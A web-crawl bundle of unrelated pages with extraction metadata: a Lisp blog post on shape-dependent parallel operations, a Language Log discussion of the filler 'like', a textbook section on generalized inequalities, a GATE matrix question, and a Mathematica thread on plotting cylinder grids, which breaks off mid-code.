{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 4, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6437001824378967, "perplexity": 308.13326786692045}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178359497.20/warc/CC-MAIN-20210227204637-20210227234637-00080.warc.gz"}
http://lisp-ai.blogspot.com/2012/08/parallel-operations-that-are-dependent.html
## Tuesday, August 28, 2012 ### Shape dependent paralellism Map, reverse, and transpose are paralell operations whose targeting scheme is dependent upon the shape of their argument. For example, here is the targeting scheme generated by the map operation on a list whose shape (or size) is 3 with respect to func: {(nth 0) func (nth 1) func (nth 2) func} On the other hand, reverse operation runs swap operations in parallel. With respect to a list of size five, the reverse operation runs two shape operations leaving the middle unchanged {(list-places (nth 0) (nth 4)) swap (list-places (nth 1) (nth 3)) swap} Here is the transpose operation on a matrix that is shaped like [[0 1 2] [3 4 5]]: {(list-places (nth 1) (nth 3) (nth 4) (nth 2)) (shift 4) (list-places (compose first dimensions) (compose second dimensions)) swap}} The transpose operation is much more complicated then the others because it also reverses the dimensions of the grid.
2017-06-28 10:37:08
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5104489922523499, "perplexity": 3952.2232844354735}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128323604.1/warc/CC-MAIN-20170628101910-20170628121910-00595.warc.gz"}
https://languagelog.ldc.upenn.edu/nll/?p=22504
## Like thanks In addition to the evergreen list of things to be thankful for — family, friends, health, worlds full of wonder — I'd like to make a plug for the internet, that connects us to all of them. Less directly than we might sometimes wish, but much more easily. And for anyone interested in speech, language, and communication, the internet and the virtual universe behind it offer an extraordinary opportunity to make voyages of discovery, and to share what we find. Here's a tiny example, something from the margins of a small project. I've been dis-editing the transcripts of some Fresh Air interviews, adding disfluencies and so on. Because there are hundreds if not thousands of these interviews available both as audio files and as (clean) transcripts, they offer an interesting opportunity to look at various phenomena in a more or less consistent setting. Yesterday I reported a bit of evidence about "UM / UH accommodation", and this morning I dis-edited a couple more transcripts, and I thought I noticed a generational effect in the frequency of the discourse particle like, as in this quotation from an interview with Lena Dunham: I mean, my mom always tells the story of like, you know, from the backseat of the car she and my parent- my dad, when I was like three, would be talking about someone from work. And I'd scream what color's her hair? How old is she? Does she have a husband? Like I just- I needed to know everything about everyone. I'm not the first — or the thousandth — person to notice that this is an example of language change in progress. See "Like youth and sex" (6/28/2011) for some previous discussion. But the effect struck me as pretty consistent on an individual basis in the Fresh Air interviews that I've seen so far, and so I decided to look at it a bit more quantitatively. The evidence for like-accommodation is more equivocal (though the effect may turn out to be real): Not a big thing. But I'm thankful! Update– Interestingly, there's similar age grading of speaking rate (except for Carrie Brownstein, whose speech in the analyzed interview has very long silent pauses throughout): This might just be older people slowing down. But maybe it supports the view of a young person of my acquaintance: ok like i am always gonna proudly overuse the word "like" bc it makes all the right people mad,, and i like it as a word, i think its aesthetically pleasing,its nice to pepper it in its like. u are winding ur speech around..a central multi purpose word that can even serve as interjection.. like is the powerhouse of the sentence 1. ### D.O. said, November 26, 2015 @ 3:37 pm 感恩 2. ### Michael Watts said, November 26, 2015 @ 4:45 pm I was in a Chinese class with a young (early 20s) Australian girl who peppered her Chinese speech with 'like' (the english word, although context suggests an analysis other than "english word"), every few words or so. Her English speech was not so affected. It's not clear to me what to conclude about what 'like' meant to her, but maybe it was what she said when she was trying to think of how to say something? 3. ### Victor Mair said, November 26, 2015 @ 7:33 pm I'm grateful that I live in a country where the internet is not filtered, constricted, banned, blocked, and censored to such a degree that only a miniscule amount of its wealth can get through. As for "like", for what it's worth: "Like, Uh, You Know: Why Do Americans Say 'You Know' And Use Other Verbal Fillers So Often?", by Palash Ghosh (International Business Times, 1/29/14): On the evening of Jan. 17, Hollywood film mogul Harvey Weinstein appeared as a guest on Piers Morgan Live on CNN to discuss his plan to make a movie that will attack the National Rifle Association and to respond to accusations that his films portray the Catholic Church negatively. While the majority of the viewing audience likely focused on the content of Weinstein's replies, a smaller segment of the audience might have been alarmed (or annoyed or amused) by the movie producer's penchant for using the meaningless phrase “you know” in his discourse. Indeed, Weinstein used that term a whopping 84 times during the broadcast. Linguists call interjections like “you know” and “like” and “um” and “I mean” and a multitude of others “filler” or “discourse particles” – that is, an unconscious device that serves as a pause in the middle of a sentence as the speaker gathers his or her thoughts but wants to maintain the listener’s attention. However, it would appear that such fillers – which have minimal grammatical or lexical value – have infiltrated daily conversations to such an extent that they threaten to further damage the beauty, power and effectiveness of verbal communication…. [(myl) This is actually pernicious nonsense — nonsense because the only thing that has changed over time is what the "fillers" are, not how frequent they are, on average; and pernicious because it feeds into all the world's worst "kids today" prejudices.] 4. ### phspaelti said, November 26, 2015 @ 8:47 pm Is the ration of TG / Guest speech always roughly the same across interviews? Or are there significant variations? 5. ### Bloix said, November 26, 2015 @ 9:54 pm "because the only thing that has changed over time is what the "fillers" are," I do not believe that this is true. I think a man of the status, power, and experience in public speaking of a Harvey Weinstein would at some point in the not-too-distant past have been able to spin out long, grammatically correct sentences without hesitation, filler, or self-interruption. 6. ### Ken Miner said, November 26, 2015 @ 10:57 pm This is actually pernicious nonsense I hear you, but we still admire "good speakers". Keith Wrightson teaches a course at Yale on Tudor-Stewart England. He lectures straight through. He is just about the best lecturer I have ever heard. He never utters an "ah" or an "er". Every sentence is polished perfection, he uses adult vocabulary, he makes no references to pop culture, and he seems to have no ego. He uses some notes, but they do not get in his way. Yet he won a teaching award! There is a God after all. [(myl) Individuals at any time in history differ widely among themselves in how frequently they use all sorts of fillers, just as they differ in how fast they talk and so on. And any individual also differs in filler frequency across occasions. What is pernicious nonsense is the idea that "such fillers […] have infiltrated daily conversations" to a greater and greater extent over time, or that "they threaten to further damage the beauty, power and effectiveness of verbal communication" to a steadily increasing extent.] 7. ### Rebecca said, November 26, 2015 @ 11:44 pm I would imagine that most people have times when they use more or less fillers. I was curious to hear what filler-free speech sounded like when it was not part of a theatrical performance, so I googled Keith Wrightson, mentioned by Ken Miner above. Picking the first video that popped up, he used at least three "uh"s or "um"s in the first 15 seconds or so. Maybe an off day, or maybe certain fillers don't interrupt our attention to content, or maybe certain contexts (like on TV or radio) make them more noticeable, since we hear so much scripted speech in those contexts? 8. ### Ken Miner said, November 27, 2015 @ 12:15 am @ Rebecca You're quite right, I checked it. So I was wrong with my "never". But when he gets going in his actual lectures (what you watched was the beginning of his intro to the course), fillers are – I'll be more careful this time – nearly absent. I'm sure I've heard speakers who have trained themselves never to use hesitation forms. I tried to do that in my own lectures, because I know how annoying they can be, especially when overdone, and didn't find it that hard. 9. ### Ken Miner said, November 27, 2015 @ 12:19 am By the way, all you have to do is, when you feel a vocal filler coming on, is to pause. 10. ### Michael Watts said, November 27, 2015 @ 1:34 am I often pause to think instead of vocalizing an uhh (I also often say the uhh). Pausing is extremely disorienting for your audience, if there's any question at all of whether you're going to continue speaking. 11. ### Chas Belov said, November 27, 2015 @ 3:29 am TG = Terry Gross? 12. ### joanne salton said, November 27, 2015 @ 3:30 am Surely the "like" is sometimes a sort of badge of identity, and also a signal that one does not wish to come over harsh and pretentious (and old-fashioned like me), and thus especially frequent. If that is not true then it would be the most counter-intuitive linguistic fact I have ever encountered. 13. ### Chas Belov said, November 27, 2015 @ 3:33 am Ah, yes, I see that now that I've read the UH/UM accomodation post, which would seem to be a prerequisite for comprehending this current post. 14. ### mgh said, November 27, 2015 @ 4:45 am Does the correlation hold up if you plot filler frequency vs speech time rather than number of words, ie normalize for differences in rates of speech? I am thinking that Willie Nelson speaks slowly, and you may need more fillers as you try to talk faster. [(myl) Actually Willie Nelson uses "uh" at a pretty good clip even in terms of word-count frequency: 27.7 per thousand words. He doesn't ever use "um", but in terms of UM+UH, his overall rate is still higher than any of the other Fresh Air interviewees I've checked, both in instances per thousand words and in terms of instances per minute: Birth Per kW Per Min WillieNelson 1933 27.73 4.23 StephenKing 1947 14.53 2.42 JillSoloway 1965 15.48 2.77 DanielTorday 1977 17.93 4.07 RichardFord 1944 10.45 2.00 CarrieBrownstein 1974 20.18 2.58 JohnKander 1927 19.13 2.51 If we add in the counts of "like", then Willie is still the winner in terms of frequency per thousand words, but he loses to Jill Soloway and Daniel Torday in terms of frequency per minute: Birth Per kW Per Min WillieNelson 1933 30.14 4.60 StephenKing 1947 20.42 3.40 JillSoloway 1965 26.58 4.75 DanielTorday 1977 28.29 6.43 RichardFord 1944 13.86 2.65 CarrieBrownstein 1974 28.04 3.59 JohnKander 1927 23.48 3.08 And we could go on to look at other common fillers like "you know", "I mean", "so", "well"; at less common fillers like "right?"; at repetitions like "and- and- and" or "I- I- I"; at painfully long silences; and so forth. ] 15. ### David Morris said, November 27, 2015 @ 5:41 am A few months ago I watched the first part of a talk by Stephen Fry in the Sydney Opera House (thinks: I much watch the end of that). He alternated between spontaneous sections about his impressions of Sydney and what he'd done there on this trip, and 'set pieces' (for the want of a better word) about his road to university, meeting Hugh Laurie, their first work in comedy, reflections on comedy or language – material which he's obviously written or spoken about (perhaps many times) before. It was very noticeable that the rate of fillers, hesitations, false starts, backtracking and recasting etc, was much higher during the spontaneous sections than the set ones. I think that the seeming growth in fillers, etc is due to the fact that, in the past, we generally only (or more) heard 'professional' speakers speaking (relatively) prepared material. Now, with technology including the internet, we can hear just about anyone, speaking just about anytime. As I was typing this, I was subvocalising (and occasionally actually vocalising) my thoughts. I noticed that my (sub)vocalisations included ums and ahs which obviously do not show up in the written version. [(myl) Excellent points. I'd add that people who notice a vocal habit that's different from theirs, and is associated with others whom they're disposed to resent, will tend (in perception and memory) to exaggerate its frequency relative to analogous habits that they find more familiar and comfortable.] 16. ### Geoff said, November 27, 2015 @ 7:38 am Remember that fillers, by slowing things down, not only help the speaker to gather their thoughts, they also help the listener to keep up. The concise and elegant speech of a practised lecturer may look nice in the written paper, but it's not necessarily most helpful for live listeners. 17. ### joanne salton said, November 27, 2015 @ 8:02 am People often comment negatively on "like" in particular – can you think of a comparable historical example where a filler became an object of cross-generational conflict? Gore Vidal once claimed to be the last man alive who spoke in complete grammatical sentences. Perhaps he was the last man who wished to? 18. ### Richard Krummerich said, November 27, 2015 @ 10:04 am The first character I remember saying" like" was Maynard G. Krebs the Bob denver role in The Lives and Loves of Dobbie Gillis. [(myl) From page 4 of Kerouac's On the Road (1957) — Dean Moriarty says: “Man, wow, there’s so many things to do, so many things to write! How to even begin to get it all down and without modified restraints and all hung-up on like literary inhibitions and grammatical fears . . .” The Dobie Gillis TV series started in 1959, which is later, but the the Max Shulman "Dobie Gillis" short stories started coming out in 1945, so maybe they have priority. Anyhow the adverbial/discourse-particle uses of like were certainly associated with stereotypical beat-generation lingo.] 19. ### January First-of-May said, November 27, 2015 @ 5:15 pm I don't know how, but this particular filler (and/or its "quotative" sense) had somehow managed to infiltrate even my English (at least, its spoken version) – even though I'm pretty sure it shouldn't have come up much in anything used in my education, both formal and informal (except perhaps the occasional internet text – but even online, people don't use that sort of stuff in writing anywhere near as often as in speech). That said, I probably just caught it somewhere on YouTube (and/or when talking to some American that I happened to meet). 20. ### Ken Miner said, November 28, 2015 @ 3:43 am You can find 'like' in US Spanish: "cuando tenia como 19 años expuse unos dibujos en una muestra colectiva" ("When I was like 19 years old I exposed some drawings in a group show"). (http://www.taringa.net/leodookie/mi/q0Zsi) Don't think anybody has explored this. 21. ### John Walden said, November 28, 2015 @ 5:23 am It certainly gets used in BrE, and for all I know elsewhere, as a way of reporting speech. Though perhaps to paraphrase and not be as verbatim as I said/he said might be: "And he's like: Will you help me? And I'm like: No way! And he's like:Why not?" "I'm kinda: I'm not sure" and "I go: Because I haven't got time" sound much the same. And asking to be shot down by pesky details like statistics and facts, I'd say that "I'm like:………" does sound a bit Brit Girl. 22. ### Ray said, November 28, 2015 @ 6:17 am I’ve noticed of late that teevee pundits and experts and celebrities will use “so…” to begin their answer, usually to a serious, complex question that involves a serious, complex explanation or summary. it always strikes me as endearingly informal and conversational, like an adult who’s borrowing from their adolescent speech style, but trying to sound more adult. It’s like, “so” is a brief filler/pause, while also expressing “I hear what you’re asking but I also want to signal that we need to back up so I can explain the larger premise of your question and the context of my answer." 23. ### Thomas Leslie said, November 28, 2015 @ 10:02 am @ Ken Miner, I wonder whether that "como" is just a way to signal an approximation (i.e. "When I was about 19 years old I presented…") rather than a quotative/filler a la English "like"? Claudia Holguín Mendoza out of U. of Oregon has done some work on, like, a number of Mexican Spanish quotatives and discourse particles which are similar to English "like" and "be+like". Check out her chapter "Pragmatic functions and cultural communicative needs in the use of innovative quotatives among Mexican bilingual youth" in Sociolinguistic Change Across the Spanish-speaking World : Case Studies in Honor of Anna Maria Escobar (2015). Should be accessible in digital form. 24. ### Ken Miner said, November 28, 2015 @ 10:17 am @ Ray Totally cool! I thought I was the only one in the world who noticed this new use of "so". I've been calling it "introductory 'so'". It's nearly as widespread in the US now as the "double copula" (on which Wikipedia now has an article). 25. ### Bloix said, November 28, 2015 @ 10:58 am Geoff Nunberg of this very blog did a commentary on NPR on introductory so a couple of months ago. http://www.npr.org/2015/09/03/432732859/so-whats-the-big-deal-with-starting-a-sentence-with-so To me, it seems like a substitution for well, which seems to have fallen back as a way to start a sentence. Well feels slower and older than so. [(myl) In this limited set of 10 interviews, the ratio of SO/WELL does seem to increase with increasing year of birth: ] Like seems to have originated, not as filler, but as a word with actual meaning – either "for example," as in the Kerouac excerpt Mark quotes in response to Richard Krummerich, above, or with the related meaning "more or less, approximately," as in "he was like 19 when it happened," to paraphrase Ken Miner's example. It may have been an abbreviated form of "things like" or something like." [(myl) There's good reason to believe that ALL fillers — including UM and UH — have "actual meaning".] 26. ### Ray said, November 28, 2015 @ 12:23 pm @Bloix thanks for the link! — the article describes perfectly how I've been hearing the "so" thing. I think the "so" thing also seems on the rise among the explaining classes in the media because of an increasing awareness that the questions themselves are so often posed, in such public arenas, as contentious statements, and so there's a need to 1) acknowledge that and 2) frame that before 3) responding to that. (I think "like" is also a kind of defensive thing. and so maybe these fillers are really about power dynamics?) 27. ### Rebecca said, November 28, 2015 @ 12:29 pm Speaking of the "so" filler to begin answers, I find the explanation-ending "so…yeah" very interesting. Among its many uses, 11 year olds find it useful when reporting misbehaviour (either their own or a colleague's) and find it prudent to let some details be inferred by the listener (me). But it's common enough to have its own blog and facebook page. I would so love to hear a tv pundit use this. By now, surely, someone has. 28. ### Rodger C said, November 28, 2015 @ 12:40 pm So. The Spear-Danes in days gone by And the kings who ruled them had courage and greatness. We have heard of those princes’ heroic campaigns. 29. ### Jenny Chu said, November 29, 2015 @ 9:26 pm Two (unrelated) thoughts on this: 1. In the book "Drifters" by James Michener, published in 1971 and set in 1969, the narrator goes on a rant about an 18-year-old character using "like" all the time (especially in conjunction with "wow", as in "I mean, like wow!"). So is it a language change? Or is it a flexible age marker? I am 42 and use "like" a lot less than I used to when I was, like, 16. [(myl) That's always a question about age-graded phenomena. In this case, at least, we can be sure that English-speaking young people didn't characteristically use discourse-particle like a couple of hundred years ago — think Huckleberry Finn. And even in 1950, like doesn't seem to have been widespread in the general population — think The Catcher in the Rye as opposed to On the Road.] 2. From a course in Old Church Slavonic long ago, I vaguely remember that there is a construction in which one can use "byl jako" (or something similar) to introduce a quote. Like, "And Jesus, to his disciples, was like, 'Come follow me.'" Any Slavic philologists around who can confirm or refute this? 30. ### Terry Hunt said, November 30, 2015 @ 11:13 am @ Roger C Hwaet's that you say? 31. ### Barbara Phillips Long said, December 1, 2015 @ 12:08 am @ Ken Miner — I often do pause when speaking, and sometimes I get interrupted at that point. I am not particularly offended by this, since I struggle to prevent myself from interrupting others. I think using fillers can signal that there's more to come and help stave off interruptions. In general, my experience is that some people speak fluently in public and some don't. Some professors I had (early 1970s) delivered very showy lectures, and others stuttered and stammered and used fillers and sometimes even failed to make the point they had intended to. I experienced excellent and dreadful lectures from professors in both English and linguistics, had a philosophy professor who appeared to have stage fright, and struggled to pay attention to a computer science professor who said "uh" so often that I started counting the number of "uhs" then during subsequent lectures had quite a bit of trouble focusing on content rather than fillers.
2020-11-29 23:20:45
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3212386667728424, "perplexity": 4499.680149949054}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141203418.47/warc/CC-MAIN-20201129214615-20201130004615-00656.warc.gz"}
https://tisp.indigits.com/convex_sets/generalized_inequality.html
# 9.7. Generalized Inequalities# A proper cone $$K$$ can be used to define a generalized inequality, which is a partial ordering on $$\RR^n$$. Definition 9.38 Let $$K \subseteq \RR^n$$ be a proper cone. A partial ordering on $$\RR^n$$ associated with the proper cone $$K$$ is defined as $x \preceq_{K} y \iff y - x \in K.$ We also write $$x \succeq_K y$$ if $$y \preceq_K x$$. This is also known as a generalized inequality. A strict partial ordering on $$\RR^n$$ associated with the proper cone $$K$$ is defined as $x \prec_{K} y \iff y - x \in \Interior{K}.$ where $$\Interior{K}$$ is the interior of $$K$$. We also write $$x \succ_K y$$ if $$y \prec_K x$$. This is also known as a strict generalized inequality. When $$K = \RR_+$$, then $$\preceq_K$$ is same as usual $$\leq$$ and $$\prec_K$$ is same as usual $$<$$ operators on $$\RR_+$$. Example 9.20 (Nonnegative orthant and component-wise inequality) The nonnegative orthant $$K=\RR_+^n$$ is a proper cone. Then the associated generalized inequality $$\preceq_{K}$$ means that $x \preceq_K y \implies (y-x) \in \RR_+^n \implies x_i \leq y_i \Forall i= 1,\dots,n.$ This is usually known as component-wise inequality and usually denoted as $$x \preceq y$$. Example 9.21 (Positive semidefinite cone and matrix inequality) The positive semidefinite cone $$S_+^n \subseteq S^n$$ is a proper cone in the vector space $$S^n$$. The associated generalized inequality means $X \preceq_{S_+^n} Y \implies Y - X \in S_+^n$ i.e. $$Y - X$$ is positive semidefinite. This is also usually denoted as $$X \preceq Y$$. ## 9.7.1. Minima and maxima# The generalized inequalities ($$\preceq_K, \prec_K$$) w.r.t. the proper cone $$K \subset \RR^n$$ define a partial ordering over any arbitrary set $$S \subseteq \RR^n$$. But since they may not enforce a total ordering on $$S$$, not every pair of elements $$x, y\in S$$ may be related by $$\preceq_K$$ or $$\prec_K$$. Example 9.22 (Partial ordering with nonnegative orthant cone) Let $$K = \RR^2_+ \subset \RR^2$$. Let $$x_1 = (2,3), x_2 = (4, 5), x_3=(-3, 5)$$. Then we have • $$x_1 \prec x_2$$, $$x_2 \succ x_1$$ and $$x_3 \preceq x_2$$. • But neither $$x_1 \preceq x_3$$ nor $$x_1 \succeq x_3$$ holds. • In general For any $$x , y \in \RR^2$$, $$x \preceq y$$ if and only if $$y$$ is to the right and above of $$x$$ in the $$\RR^2$$ plane. • If $$y$$ is to the right but below or $$y$$ is above but to the left of $$x$$, then no ordering holds. Definition 9.39 We say that $$x \in S \subseteq \RR^n$$ is the minimum element of $$S$$ w.r.t. the generalized inequality $$\preceq_K$$ if for every $$y \in S$$ we have $$x \preceq y$$. • $$x$$ must belong to $$S$$. • It is highly possible that there is no minimum element in $$S$$. • If a set $$S$$ has a minimum element, then by definition it is unique (Prove it!). Definition 9.40 We say that $$x \in S \subseteq \RR^n$$ is the maximum element of $$S$$ w.r.t. the generalized inequality $$\preceq_K$$ if for every $$y \in S$$ we have $$y \preceq x$$. • $$x$$ must belong to $$S$$. • It is highly possible that there is no maximum element in $$S$$. • If a set $$S$$ has a maximum element, then by definition it is unique. Example 9.23 (Minimum element) Consider $$K = \RR^n_+$$ and $$S = \RR^n_+$$. Then $$0 \in S$$ is the minimum element since $$0 \preceq x \Forall x \in \RR^n_+$$. Example 9.24 (Maximum element) Consider $$K = \RR^n_+$$ and $$S = \{x | x_i \leq 0 \Forall i=1,\dots,n\}$$. Then $$0 \in S$$ is the maximum element since $$x \preceq 0 \Forall x \in S$$. There are many sets for which no minimum element exists. In this context we can define a slightly weaker concept known as minimal element. Definition 9.41 An element $$x\in S$$ is called a minimal element of $$S$$ w.r.t. the generalized inequality $$\preceq_K$$ if there is no element $$y \in S$$ distinct from $$x$$ such that $$y \preceq_K x$$. In other words $$y \preceq_K x \implies y = x$$. Definition 9.42 An element $$x\in S$$ is called a maximal element of $$S$$ w.r.t. the generalized inequality $$\preceq_K$$ if there is no element $$y \in S$$ distinct from $$x$$ such that $$x \preceq_K y$$. In other words $$x \preceq_K y \implies y = x$$. • The minimal or maximal element $$x$$ must belong to $$S$$. • It is highly possible that there is no minimal or maximal element in $$S$$. • Minimal or maximal element need not be unique. A set may have many minimal or maximal elements. Lemma 9.1 A point $$x \in S$$ is the minimum element of $$S$$ if and only if $S \subseteq x + K$ Proof. Let $$x \in S$$ be the minimum element. Then by definition $$x \preceq_K y \Forall y \in S$$. Thus $\begin{split} & y - x \in K \Forall y \in S \\ \implies & \text{ there exists some } k \in K \Forall y \in S \text{ such that } y = x + k\\ \implies & y \in x + K \Forall y \in S\\ \implies & S \subseteq x + K. \end{split}$ Note that $$k \in K$$ would be distinct for each $$y \in S$$. Now let us prove the converse. Let $$S \subseteq x + K$$ where $$x \in S$$. Thus $\begin{split} & \exists k \in K \text{ such that } y = x + k \Forall y \in S\\ \implies & y - x = k \in K \Forall y \in S\\ \implies & x \preceq_K y \Forall y \in S. \end{split}$ Thus $$x$$ is the minimum element of $$S$$ since there can be only one minimum element of S. $$x + K$$ denotes all the points that are comparable to $$x$$ and greater than or equal to $$x$$ according to $$\preceq_K$$. Lemma 9.2 A point $$x \in S$$ is a minimal point if and only if $\{ x - K \} \cap S = \{ x \}.$ Proof. Let $$x \in S$$ be a minimal element of $$S$$. Thus there is no element $$y \in S$$ distinct from $$x$$ such that $$y \preceq_K x$$. Consider the set $$R = x - K = \{x - k | k \in K \}$$. $r \in R \iff r = x - k \text { for some } k \in K \iff x - r \in K \iff r \preceq_K x.$ Thus $$x - K$$ consists of all points $$r \in \RR^n$$ which satisfy $$r \preceq_K x$$. But there is only one such point in $$S$$ namely $$x$$ which satisfies this. Hence $\{ x - K \} \cap S = \{ x \}.$ Now let us assume that $$\{ x - K \} \cap S = \{ x \}$$. Thus the only point $$y \in S$$ which satisfies $$y \preceq_K x$$ is $$x$$ itself. Hence $$x$$ is a minimal element of $$S$$. $$x - K$$ represents the set of points that are comparable to $$x$$ and are less than or equal to $$x$$ according to $$\preceq_K$$.
2022-12-08 16:38:26
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9864436388015747, "perplexity": 138.95312364501123}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446711344.13/warc/CC-MAIN-20221208150643-20221208180643-00312.warc.gz"}
https://ec.gateoverflow.in/863/gate-ece-2016-set-1-question-1
84 views Let $M^4$= $I$,(where $I$ denotes the identity matrix) and $M \neq I$, $M^2\neq I$ and $M^3\neq I$. Then,for any natural number $k$,  $M^{-1}$ equals: 1. $M^{4k+1}$ 2. $M^{4k+2}$ 3. $M^{4k+3}$ 4. $M^{4k}$
2022-10-04 20:37:42
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.997958242893219, "perplexity": 306.29333228049796}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00694.warc.gz"}
https://mathematica.stackexchange.com/questions/238849/contourplot3d-grid-of-cylinders
# ContourPlot3D, grid of cylinders I am trying to make a 3D contour plot that looks like a grid of cylinders to represent the Fermi surface of a metal, like below: I have no problem generating something that kind of looks like it. (Cos[x] + Cos[y] + Cos[z] == 0). (This shows multiple unit cells.) I need it to be more cylindrical, though. I need to also later plot cross-sections of this for planes at different heights, so it is more than just wanting the accurate figure. I think this is tricky because it is not well-suited to either cylindrical coordinates or spherical coordinates. I was thinking that I could just create three cylinders at right angles to each other and superimpose them, but I can't figure out a way to make the equation for cylinders. Any help on this would be great! • Do you want real cylinders or "smoothed cylinders" like the approaches with Cos? Should the interior be hollow or filled? – A.Z. Jan 27 at 9:49 • The "real cylinders" approach would correspond to Michael's and my answer, while cvgmt's answer uses a nodal surface approximation. – J. M.'s ennui Jan 27 at 16:44 • Another approach would be to use Cylinder and RegionUnion to construct a single Region object – b3m2a1 Jan 27 at 17:49 • @J.M. I think that the nodal surface approximation is actually closer to the physical situation that I am modeling (Fermi surface), but your answer is also very useful. I can't seem, however, to make the cross-sections without there being little gaps in the circles using your approach (I think because of the Round[] function). – Nick Jan 27 at 18:26 • @Nick, are you using the current version in my answer? Indeed, the previous formulation of my answer had those artifacts, but I do not believe the current one does. – J. M.'s ennui Jan 27 at 18:35 Maybe add some perturbed term such as Cos[x]*Cos[y]*Cos[z] or Cos[x]*Cos[y]+Cos[y]*Cos[z]+Cos[z]*Cos[x] to Cos[x] + Cos[y] + Cos[z]. ContourPlot3D[ Cos[x] + Cos[y] + Cos[z] - 1.5 Cos[x] Cos[y] Cos[z] == 1.5, {x, -9, 9}, {y, -9, 9}, {z, -9, 9}, ContourStyle -> FaceForm[Orange, Cyan], Mesh -> None, Boxed -> False, Axes -> False] • This is exactly what I was thinking! – Nick Jan 27 at 3:17 cvgmt had the right idea to use a periodic function. Using a technique similar to what I did here, here is how to use Round[] (for periodicity) with Max[] (as a stand-in for Boolean OR): With[{c = 1, r = 1/4}, ContourPlot3D[Max[r^2 - (x - Round[x, c])^2 - (y - Round[y, c])^2, r^2 - (y - Round[y, c])^2 - (z - Round[z, c])^2, r^2 - (z - Round[z, c])^2 - (x - Round[x, c])^2] == 0, {x, -3/2, 3/2}, {y, -3/2, 3/2}, {z, -3/2, 3/2}]] You'd need to be prepared to crank up PlotPoints and MaxRecursion for this approach (with the concomitant increase in memory requirements). A variation of this theme is to replace Max[] with a smooth version like $$\log$$-sum-$$\exp$$: With[{c = 1, r = 1/4, k = 30}, ContourPlot3D[Log[Total[ Exp[k {r^2 - (x - Round[x, c])^2 - (y - Round[y, c])^2, r^2 - (y - Round[y, c])^2 - (z 